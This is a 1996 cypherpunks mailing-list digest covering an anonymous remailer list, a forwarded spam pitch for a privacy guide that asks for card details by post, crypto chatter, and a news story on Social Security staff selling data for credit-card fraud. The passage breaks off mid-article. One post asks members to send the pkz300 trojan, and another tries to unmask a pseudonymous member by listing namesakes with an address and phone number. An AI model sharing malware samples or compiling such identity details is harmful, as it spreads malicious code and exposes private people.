Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

The squirrel remailer accepts PGP encrypted mail only.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 25 Nov 96 6:45:17 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
weasel   config@weasel.owl.de             -++---++++++  1:58:22  99.99%
jam      remailer@cypherpunks.ca          ************    14:14  99.98%
haystack haystack@holy.cow.net            **--#+**#**#     7:03  99.89%
cyber    alias@alias.cyberpass.net         ++**++*****    35:06  99.84%
balls    remailer@huge.cajones.com        ****** *****     5:08  99.79%
lucifer  lucifer@dhp.com                  ++++++++++++    38:35  99.62%
lead     mix@zifi.genetics.utah.edu       +++++-+*++++    39:55  99.61%
extropia remail@miron.vip.best.com        ---.-------   7:31:23  99.55%
nym      config@nym.alias.net              *#**###*+##     1:05  99.51%
squirrel mix@squirrel.owl.de              -++  ++++++   2:02:00  98.98%
mix      mixmaster@remail.obscura.com     ++++--+++-+   1:16:28  98.92%
reno     middleman@cyberpass.net          +*---------   2:30:43  98.78%
replay   remailer@replay.com              ********** *    10:10  98.48%
middle   middleman@jpunix.com              +------ --   2:40:34  97.86%
dustbin  dustman@athensnet.com            -  .-+*+  ++  3:09:24  95.37%
exon     remailer@remailer.nl.com            #########  1:40:10  86.24%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EBDAVIS@aol.com
Date: Mon, 25 Nov 1996 04:24:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fwd: Your Email Privacy Has Been Compromised
Message-ID: <961125072341_805751587@emout02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI
---------------------
Forwarded message:
From:	securityadmn@netsecurity.yes
Date: 96-11-18 05:31:58 EST




This Message Contains Important Information About Violations
of Your On-Line Privacy.



*Email and Online Security Violations.*
Please be advised that information contained in email is similar 
to a post card.  It can easily be read in transit and does not go 
directly from your computer, to the computer of the recipient.  
Your message often passes through the hands of countless 
computer systems on its path to where you sent it.  Because of 
this, it can easily be seen by many prying eyes on the way to its 
destination.  If you are mailing personal, business or financial 
data it is unwise to use traditional email.  There are many people 
on the net who profit by snooping in the open "post card" style 
email that most account holders utilize.  Programs are readily 
available to make this task simple.  Additionally, many people 
are purchasing mailing lists which contain your email address.  
If you do not wish to receive unsolicited email, there are a 
number of free and highly effective steps you can take to 
recapture your privacy.

The personal exposure spoken of is not limited to email.  If you 
make use of other internet services such as the World Wide 
Web, your privacy is at even greater risk.  Unless secure, any 
information you enter on a form can be read in transit, just like 
email.  Additionally, most of the information providers you contact 
on the web routinely collect information about you in high detail.  
This information goes right down to where you are located, and 
what kind of computer and operating system you use!

To combat this problem, many countermeasures have been 
developed of which most account holders remain unaware.  The 
on line criminals would like to keep it that way.  Every net citizen 
needs to learn to stop sending "Post Cards" and stop allowing 
distant machines to accumulate large amounts of information 
about who they are and their interests.

There are many simple things you should be doing right now to 
protect your privacy.  Most of the best countermeasures available 
are FREE.  This is because there is still a very strong vein of 
computer experts on the net who believe in an individual's right to 
privacy.  There are excellent, completely free  programs that you 
should be using right now to browse the web in an untraceable 
and private manner, and send email that only the recipient can 
read!

You don't need to be a computer expert to use these tools.  They 
often take little or no additional time and are designed to be very 
simple for the computer illiterate to use.  The computer gurus 
that designed these programs know that it is extremely important 
that average net citizens make use of them.  They have designed 
and continually revised them with that in mind.

My name is Jeff Martin, my associates and I have spent a great 
deal of time researching this subject. It is my goal to provide you 
with access to the best resources available to keep your 
communications private.  My information relates to both email 
and other aspects of the internet such as the World Wide Web.  
This information was put together because I don't feel that others 
are making it available in this form of wide distribution, and it 
needs to be done.  The internet is just like a city in that you need 
some street smarts to keep yourself as safe as possible.  That's 
the kind of information I wish would have been provided to me 
when I began to go on line, and it is what I have tried hard to put 
together to help you out.

In my program you'll learn:

*How to send email that cannot be traced.

*How to send email to your friends and associates that cannot 
be read in transit.

*How to post anonymously to Newsgroups.

*How to browse the web and download files anonymously.

*Why you should (almost) never send financial information over 
the net.

*How to prevent your name from being gathered and sold for 
bulk email use.

*And Much, Much, Much, More ....

My package is a treasure trove of valuable information collected 
to guarantee your privacy!

This is the first time I am making this information available.  In a 
short while, the program will be retailing for $59.95.  However, if 
you respond within the next 7 days of receiving this message you 
will receive the special price of $19.95.  Because of the amazing 
expansion of the internet, I have decided to make this offer so 
that everyone can afford to learn how to protect themselves from 
the net's growing criminal element.  After seven days you may 
still order the program at its retail price of $59.95.

Additionally, if you order within the next 48 hours, I'll include a 
very special report about how you can get a free email address 
and account to use from just about anywhere in the U.S.  I'll 
show you how, but you must order within the next 48 hours!

HOW TO ORDER
I strive very hard to protect your security.  I do not accept 
unsecure credit card or check information by email, because it is 
too easily intercepted.  While this could increase my orders, I feel 
that your security as a customer is more important. I am a small
business person and keeping up with phoned and faxed in orders
has proven to be too difficult for me.  Therefore I now only accept
orders via postal (snail) mail.  Please be certain to give me your
email address when ordering.  I prefer to ship orders via email
so that you can have my information as soon as possible.

To order send a check, money order, or credit card information
(Visa, MasterCard, Discover) to me at:

Jeff Martin
POB 72106
Newport, Kentucky 41072

Any credit card orders must use the attached form below.
Thank you very much for your time.

Best Wishes,

Jeff Martin


This information will always be held in the strictest confidence.
 
 Credit Card:    Visa    Mastercard    Discover
 
 Card #:______________________________________
 
 Expiration Date:__________________
 
 Name on Card:________________________________
 
 Please indicate amount $__________ ($19.95) or (59.95)
 
 
 SIGNATURE:x________________________ 

DATE:x__________________
 

Copyright 1996, Jeff Martin.  All rights reserved.


































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: inssdl@dstn21.dct.ac.uk (inssdl)
Date: Mon, 25 Nov 1996 00:32:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: A source of entropy?
Message-ID: <9611250834.AA11220@dstn21.dct.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Last weekend I spent time formatting a little over 100 new floppies. When 
I was staring at the monitor between changes, I started looking at the 
volume serial number that was being thrown up for each disk.

These *appeared* to be unpredictable from the previous serial number given.

If the serial number is represented as xxxx-yyyy then sometimes yyyy 
would be one less than the previous yyyy but xxxx always seemed to be 
"random".

The disks were all brand new, no errors (from a couple of boxes of 50 and 
some odd ones), formatted at the Win95 DOS prompt with 'format a: /u' no 
volume labels and pressing 'y' to format the next disk.

Would anyone like to comment on the possible entropy from these serial 
numbers, even if it's only to say "Don't be daft, DOS derives the 
numbers like this..."

I'll probably be doing a similar number next weekend. If any interest is 
generated from this post, I could always record the serial numbers given 
to the next batch to look for correlations.

(Please don't reply with 'invest in a bulk-formatter' - I can't afford 
one right now.)

**********************************************************************
David Lucas PGDip Software Engineering @@ BEng(Hons) Civil Engineering
Postgraduate Software Engineer, University of Abertay Dundee, SCOTLAND
@ E-mail: inssdl@dstn21.dct.ac.uk @ 2+2 = 5  for large values of two @
If you're not living on the edge, then you're taking up too much space
Organisations can't have opinions, only people can and these are mine.
Dave's Doorstep is back!!!! - http://river.tay.ac.uk/~i95dl/index.html
**********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Mon, 25 Nov 1996 01:50:06 -0800 (PST)
To: drose@AZStarNet.com
Subject: Re: Sameer R.I.P.
In-Reply-To: <199611250311.UAA05745@web.azstarnet.com>
Message-ID: <9611250846.aa15199@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


drose@azstarnet.com wrote:
> 
> On Sun, 24 Nov 1996 Sandy Sandfort <sandfort@crl.com> wrote:
> 
> >On Sun, 24 Nov 1996 drose@AZStarNet.com wrote:
> >
> >> Sameer has decided, it seems, to get out of the anonymity
> >> business and pursue other interests.
> >
> >Well, I guess you could call privacy guaranteed by strong crypto,
> >"other interests."  Seems right in the middle of what Cypherpunks
> >are all about.  If you like strong crypto, you'll love what's
> >coming next from C2Net.
> 
> Point well taken.  Most people who are in the market for a Web server,
> however, are cognizant of the fact that along with Netscape, Microsoft, Open
> Market, O'Reilly et al, Sameer has been for some time now selling a well
> regarded product: namely, his proprietary version of Apache.

Actually, its my proprietary version of Apache, rebadged and with some extras.
My version is free. I'm pleased to hear it is "well regarded", though ;-)

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 25 Nov 1996 06:43:22 -0800 (PST)
To: freedom-knights@toad.com
Subject: Re: [Noise] Re: Thanks/was:This is your last warning
In-Reply-To: <Pine.SUN.3.94.961124162856.5157A-100000@polaris>
Message-ID: <T3cyXD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
<stuff>

I was curious about BU's choice of domain name - after all, schloss.li is the
same box as polaris.mindport.net in Norwich, CT. So I ran an altavista search
on schloss*. Like, wow! There are thousands and thousands of Web pages with
schloss* in them, and most of them may have nothing to do with Black Unicorn.

E.g., did you know that Leah Rabin's maiden name was Schlossberg?

There's a Robert Lev Schlossberg <robby@gwis2.circ.gwu.edu>.

One George Schlossberg, an attorney with Cotten and Selfon, was quoted on NPR.

Another attorney's name comes up on several interesting bankrupcy cases:
Schlossberg and DiGirolamo, P.A.
Roger Schlossberg
134 West Washington St.
Hagerstown, MD 21740
301-739-8610

A Neil Schlossberg graduated ca 1965 from Aiglon College, a boarding school in
Switzerland.

A Herbert Schlossberg, born in 1935, says this about himself:

]A considerable part of my career has been in the academic world. I have been
]an assistant professor of history at the University of Waterloo in Ontario,
]Canada; chairman of the social science division at the Harrisburg Area
]Community College in Pennsylvania; and academic dean at Shepherd College in
]West Virginia. In addition I have been an intelligence analyst in the CIA, and
]have been in the financial planning industry. I am presently serving as
]project director in the Fieldstead Institute, working on a book tentatively
]titled "The Silent Revolution and the Making of Victorian England. "

The net is lousy with Schloss*, yet BU's domain name may be just a red herring!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wireinfo <wireinfo@wire-in.com>
Date: Mon, 25 Nov 1996 07:05:09 -0800 (PST)
To: "freedom-knights" <freedom-knights@jetcafe.org>
Subject: Re: GELP/was:Word List
Message-ID: <199611251504.JAA08234@mail1.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


>>That should be a "what" is GELP.
>
>It's a type of sea weed.

it's a dessert topping. <bong gurgle>,

iMp



------------------------------------------------------------------------
"Call any vegetable, and the chances are good /
 That the vegetable will respond to you."
 Frank Zappa
------------------------------------------------------------------------
|    any replies go here    |     no e-mail replies to usenet posts    |
------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 25 Nov 1996 07:11:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: DCSB: Money Laundering -- The Headless Horseman of the Infocalypse
Message-ID: <v0300781daebf6496bc62@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----




                 The Digital Commerce Society of Boston

                              Presents
                           "Black Unicorn"

                         "Money Laundering --
               The Headless Horseman of the Infocalypse"



                        Tuesday, December 3, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


S. L. vonBernhardt, <mailto:unicorn@schloss.li>, is an attorney, a member
of the board of directors of two European financial institutions, author
of "Practical and Legal Problems Confronting the Asset Concealer in
Relation to Offshore Financial and Corporate Entities" and a former
member of the intelligence community.  He is currently working to develop
and preserve institutions dedicated to traditional standards of financial
privacy.


One of the most disturbing products of the "war on drugs" has been the
effective criminalization of many forms of formerly legal financial
transactions.  The resulting legislation places serious burdens on
financial institutions in the form of "due diligence" requirements, as
well as building what can be an inflexible barrier before those who would
implement uncompromised digital commerce systems.  Mr. vonBernhardt will
address the legislative burdens imposed on financial institutions, the
likely impact on future systems of digital commerce, potential solutions
through regulatory arbitrage, and the practical problems facing
jurisdictions seeking to enforce regulations in the face of advanced
systems of digital commerce.

No cameras, please.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, December 3, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is
$27.50. This price includes lunch, room rental, and the speaker's lunch.
;-).  The Harvard Club *does* have dress code: jackets and ties for men,
and "appropriate business attire" for women.

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, November 30, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Planned speakers for DCSB are:

 January    Rodney Thayer    Applying PGP To Digital Commerce
 February   David Kaufman    1996 in Review / Predictions for 1997
 March      TBA
 April      Stewart Baker    Encryption Policy and Digital Commerce

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you
want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b4 e22

iQCVAwUBMpmydfgyLN8bw6ZVAQEvkQQAnmg8R3OF4IJpc+xVCRut8O0O9M4ZKOkG
5iD8b+XkdAZ7UTCqAQqqL8CTIlhEn9KLzRGIQbhx+V66qAbs/9nNRFMcFgmAjKy8
TuJlRNmjgF09jrr5tWgGpH9J5K1jmGqMDOc27Cr7TLMmgdTbzcQS9oUfpmoRpNns
SFShKt2JHxA=
=5/Zo
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 25 Nov 1996 11:39:21 -0800 (PST)
To: cracker@icon.co.za
Subject: Re: Symantec's claim.
Message-ID: <3.0.32.19961125104940.006ab9a8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:45 PM 11/25/96 +0200, cracker@icon.co.za wrote:
>
>In light of recent claims,i would like somebody to clear this up for me.
>There seems to be a great deal of conjecture over wether or not the
Deeyenda Virus exhists.
>Symantec denies it's existence,although i hear differently??
>Greatly appreciate anyone who can shed some light on the subject,even
though C-punks list doesnt usually deal with this topic of thought ;)
>Anyone come across the pkz300 trojan,if you have it send it please.
>A student,a paper,and a possible future career are at stake here,so please
dig deep into your 
>pockets!!!!!! Asking a lot i know!

Deeyenda is a hoax.  (Very similar to "Good Times" and aimed towards the
same audience.)

Info on it can be found at:

http://www.kumite.com/myths/myth027.htm


---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 25 Nov 1996 10:58:19 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Star Trek: First Contact
In-Reply-To: <199611230853.AAA10184@netcom6.netcom.com>
Message-ID: <Pine.3.89.9611251007.A22766-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


The what is that gread for Gold-Latinum(sp?) all about? No money? Don't 
believe it.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred

On Sat, 23 Nov 1996, Bill Frantz wrote:

> For the fans of E.E.(Doc) Smith, go see this movie.
> 
> OBCrypto: Data locks the main computer with a fractal cypher.
> 
> OBMoney: Picard states the they don't have money in the 24th century. 
> Instead they work for the good of mankind.  Nanotechnology must have made
> everything material possible, so the only reward left is status (aka
> reputation).
> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
> (408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
> frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Mon, 25 Nov 1996 07:58:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Secret Powers
Message-ID: <199611251558.KAA08303@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i have just completed Secret Powers (reading it, that is).

unless you live in NZ, i don't think that there is much here for you.  even 
the NZ stuff was pretty tame, unless you have been living under a rock, there 
is nothing here that wasn't already known.  lots of pictures of NZ politicians 
and such stuff.  also, a picture of a vax with a caption that implies that 
these are the NSA's echelon-network computers, sigh.

the author can't seem to stay focused for very long.  also, it's hard to see 
what his underlying message is, unless, of course, it's simply to sell books 
and make money, which is in no way a bad thing.  on the one hand, he keeps 
harping on the theme of how the UKUSA (but really NSA) is forever telling NZ 
what to collect and what to do,  and how NZ should be their own masters, but 
then he talks about how very much data NZ receives every day from the NSA. 
 i guess he never heard the one about the one who pays the piper getting to 
call the tune.

he also keeps trying to make something sinister about the use of acronyms and 
code words, and insists that the radomes are to prevent anyone from calculating 
the look angle and therefore the likely satellites that the dish is looking 
at.  at another point, however, he mentions how the salt water corrosion destroyed 
an antenna array, but never seems to be able to figure out that radomes also 
protect the equipment inside from these very destructive elements.  in general, 
a lot of nonsense that doesn't every get tied together.
 
there is also this recurring theme about NZ's independence and it's nuclear-free 
shit.
perhaps there are really people in NZ that care about this stuff, but in this 
day and age, it's hard to image that there would be.

it's not like the book is poorly written or researched or anything like that, 
and it's certainly a hell of a lot more than i have done, but otherwise, .......

money isn't  much of a problem to me, so i don't regret buying this book, but 
if you aren't in the same position, i'd give this one a miss.  better to wait 
for the new release of The Puzzle Palace.  BTW, does anyone have an update 
on this? are the authors having friendly chats with the boys from the fort, 
or something like that?

if however, you really want to read it, the publishers were very prompt about 
selling me a copy  and shipping it to me via air, and were generally pleasant 
to deal with.

cheers,
        -paul







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rudd_a@alph.swosu.edu (Amy Rudd)
Date: Mon, 25 Nov 1996 11:24:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: public
Message-ID: <v01540b01aebf5a364b89@[164.58.41.89]>
MIME-Version: 1.0
Content-Type: text/plain


I am new here, and I was wondering, why are there still stupid, immature
people on line who have the audacity, here in the 90's, to still call
people a "cocksucking faggot".  I mean no offense here, but please, stop
using such offensive words!  Thanks....   As I said, I am new here, and am
a libertarian/anarchist who wants the government to butt out of our
lives...I am very interested in privacy, and am also against censorship.  I
hope there are others out there who feel as I do, but if not, I guess I'll
find out I'm on the wrong place!!   :-)   Anyhow, I hope you can welcome a
Cincinnati goth who lives in Oklahoma...thanks!!....Amy


****************************************************************************
*****
*
*     It's better to regret something you did than something you
*                                                          *
didn't do.                                             *
*                                                                              *
*                                                                              *
********************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 25 Nov 1996 09:40:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Smart card attacks vs. clipper?
Message-ID: <3299D9C1.5A53@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Has any work been done (yet) using the recently-publicised techniques
used to foil smart card tamperproofing against Clipper implementations?

Seems like it's a bit of a different story, since in the Clipper's
case the algorithm is (ostensibly) unknown, but I'm just curious as
to whether there is some compromise of its security-through-obscurity.
-- 
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Mon, 25 Nov 1996 08:51:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961125.104841.12159.2.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


[This should make you feel better about GAK]


New York Times: Thursday, November 21, 1996
 
Social Security Workers Held In Frauds Using Credit Cards
 
By LYNDA RICHARDSON
 
Federal officials announced the arrests of a group of Social Security
Administration employees Wednesday, charging them with passing

confidential information on at least 1,000 people to credit-card thieves
for
bribes as little as $10. 
 
Under the scheme, the employees would give out confidential information
that
would allow the credit-card thieves to use the cards when they made
purchases. The authorities think the thieves were able to obtain the
cards by
stealing them through the mail, in some cases.
 
The authorities said six current or former employees and a former
security
guard with the agency were arrested Tuesday in the scheme, which resulted
in at least $10 million in losses to credit card issuers from October
1995 to
this June. The credit card issuers are Citibank, Visa and Mastercard. 
 
The employees were charged with bribery and misuse of a government
computer, and face prison terms of 2 to 15 years and fines up to
$250,000. 
 
The arrests resulted from a federal investigation that began in February
into
what computer experts say may be one of the biggest breaches of security
of
federal government data on residents. 
 
Officials said 20 people have been arrested, including 10 current or
former
employees of the Social Security Administration. The scheme was first
detected in February by Citibank, which noticed an unusual amount of
fraudulent charges on credit cards it had mailed to customers but that
the
customers said they had not received, officials said. 
 
Like many banks, Citibank has a security procedure that requires
customers
who receive new cards to activate them by calling a toll-free telephone
number and provide some personal information, like their mother's maiden
name, to activate the credit card. 
 
The bank discovered that its security system had been foiled in dozens of
cases in which cards were activated by someone who was not the cardholder
but had access to the cardholder's mother's maiden name. 
 
Investigators for the Social Security Administration, which keeps files
of
maternal maiden names and records the identification number of employees
who call up files, determined that an employee at the Brooklyn Social
Security office had illegally looked at the personal records of nearly
two
dozen people and sold the information to conspirators, who activated
credit
cards, said Philip A. Gambino, an agency spokesman. 
 
Based on information from that employee, the agency identified several
other
employees who had illegally released confidential information, often in
exchange for bribes. Those arrested this week were described as low-level
workers, including claim representatives and clerks. 
 
In 1,000 cases, credit cards were activated using information illegally
provided by the government employees, Gambino said. 
 
``Most have been fired and the others are in the process of being
fired,'' he
said. 
 
Officials said the thieves who approached the Social Security employees
already had access to Social Security numbers and wanted the numbers run
through the agency's database. Social Security numbers are the closest
thing
to a universal identifier that Americans have, and are widely available
from
public sources like college and employee ID cards and hospital tags, and
even driver's licenses in more than 30 states. 
 
The investigation has resulted in the arrests of nine people, including
seven
Nigerians, who are accused of receiving or using the stolen confidential
information to commit various types of credit card fraud, said Brian F.
Gimlett, the special agent in charge of the Secret Service in New York. 
 
He said the stolen or reissued credit cards were used to buy merchandise,
obtain cash advances and line-of-credit checks and make illegal
withdrawals
from automated teller machines. 
 
Gimlett said the conspirators who approached the government workers were

not part of an organized crime ring. 
 
``Actually, most were individual operations, but doing the same type of
crime,'' he said. ``This is another example of greedy people finding new
ways
to compromise the security systems to financially gain from credit card
fraud
and other types of fraud.'' 
 

 
EFT Report: November 20, 1996
 
Micro Card Targets U.S. Smart Card Market
 
Bull CP8 Transac, of France, says it wants to help U.S. banks issue smart
cards through its U.S. subsidiary, Micro Card Technologies, of Billerica,
Mass. The company believes that 60 percent of the smart card opportunity
resides here, says Gerald Hubbard, vice president of marketing. That
market
is expected to grow to a total of about $100 million to $200 million by
the
year 2000, according to industry figures. 
 
Debit and stored-value cards are targeted as the first smart-card
applications
to be issued in the United States. 
 
As a result, Micro Card is forming alliances throughout the card industry
to
penetrate the U.S. market. It recently partnered with NBS, of Plainfield,
N.J., one of the nation's largest card manufacturers. 
 
Bull's strategy is similar to that of its competitors, says Ben Miller, 
president
of CardTech/SecurTech in Bethesda, Md. 
 
All the world's major smart card firm are bringing smart card
capabilities in
from offshore and have set up acquisitions or partnerships with U.S. card
manufacturers to build strength and confidence from American bankers,
Miller says. Schlumberger, also of France, recently bought Malco. 
 
The existing manufacturing facilities are secure and card association
compliant, helping the companies earn industry trust. The firms, in turn,
receive an existing revenue stream from the magnetic stripe sales, Miller
says.
 
Micro Card claims it has the longest U.S. history of its competitors. It
set up
shop here in 1984 and has since participated in several smart card
closed-system initiatives. For example, U.S. Marine Corp.'s recruits in
Parris
Island, S.C., receive their pay on CP8 Micro Cards, which are accepted at
post exchanges for cash withdrawals and purchases. Micro Card also has
been selected to provide half of the card readers in the Citibank and
Chase
Manhattan Bank smart card pilot in New York. 
 
Micro Card sells readers, encoders and several different types of cards
ranging from the basic one-issuer, multiple-application system, called
SCOT,
to its high-end electronic purse card that can handle multiple
applications
from several unconnected service providers, says Hubbard. Its crypto card
uses public key cryptography to secure transactions, Hubbard says. 
 

Micro Card's systems all contain microprocessors and comply with Europay,
